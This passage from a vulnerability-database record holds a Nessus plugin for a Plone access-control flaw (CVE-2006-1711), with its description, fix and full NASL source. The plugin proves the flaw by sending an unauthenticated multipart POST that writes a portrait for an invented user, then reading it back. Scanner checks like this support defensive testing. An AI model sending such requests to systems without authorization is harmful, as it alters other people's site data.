An unauthenticated attacker can leverage this\nissue to delete member portraits or add / update portraits with\nmalicious content.", "edition": 24, "published": "2006-04-14T00:00:00", "title": "Plone Unprotected MembershipTool Methods Arbitrary Portrait Manipulation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-1711"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:plone:plone"], "id": "PLONE_MEMBERSHIPTOOL_ACCESS_CONTROL_BYPASS.NASL", "href": "https://www.tenable.com/plugins/nessus/21219", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21219);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2006-1711\");\n script_bugtraq_id(17484);\n\n script_name(english:\"Plone Unprotected MembershipTool Methods Arbitrary Portrait Manipulation\");\n script_summary(english:\"Tries to change profiles using Plone\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Python application that is affected\nby an access control failure.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Plone, an open source content manage system\nwritten in Python.\n\nThe version of Plone installed on the remote host does not limit\naccess to the 'changeMemberPortrait' and 'deletePersonalPortrait'\nMembershipTool methods. 
An unauthenticated attacker can leverage this\nissue to delete member portraits or add / update portraits with\nmalicious content.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://dev.plone.org/plone/ticket/5432\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either install Hotfix 2006-04-10 1.0 or upgrade to Plone version 2.0.6\n/ 2.1.3 / 2.5-beta2 when they become available.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/04/14\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:plone:plone\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"plone_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/plone\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Get details of Plone install.\nport = get_http_port(default:80);\ninstall = get_install_from_kb(appname:\"plone\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\nurl = dir + \"/portal_membership/changeMemberPortrait\";\nr = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n exit_on_fail : TRUE\n);\nres = r[2];\n\n# If so...\nif (\n '<meta name=\"generator\" 
content=\"Plone' >< res &&\n \"The parameter, <em>portrait</em>, was omitted from the request\" >< res\n)\n{\n # Upload a profile for a nonexistent user.\n user = string(SCRIPT_NAME, \"-\", unixtime());\n portrait = rand_str();\n\n bound = \"nessus\";\n boundary = string(\"--\", bound);\n postdata = string(\n boundary, \"\\r\\n\",\n 'Content-Disposition: form-data; name=\"portrait\"; filename=\"', user, '.gif\"', \"\\r\\n\",\n \"Content-Type: image/gif\\r\\n\",\n \"\\r\\n\",\n portrait, \"\\r\\n\",\n\n boundary, \"\\r\\n\",\n 'Content-Disposition: form-data; name=\"member_id\"', \"\\r\\n\",\n \"\\r\\n\",\n user, \"\\r\\n\",\n\n boundary, \"--\", \"\\r\\n\"\n );\n http_send_recv3(\n method : \"POST\",\n item : url,\n port : port,\n content_type : \"multipart/form-data; boundary=\" + bound,\n data : postdata,\n exit_on_fail : TRUE\n );\n\n # Retrieve the newly-created portrait.\n r = http_send_recv3(\n method : \"GET\",\n item : dir + \"/portal_memberdata/portraits/\" + user,\n port : port,\n exit_on_fail : TRUE\n );\n res = r[2];\n\n # There's a problem if we get our portrait content back.\n if (portrait == res) security_warning(port);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}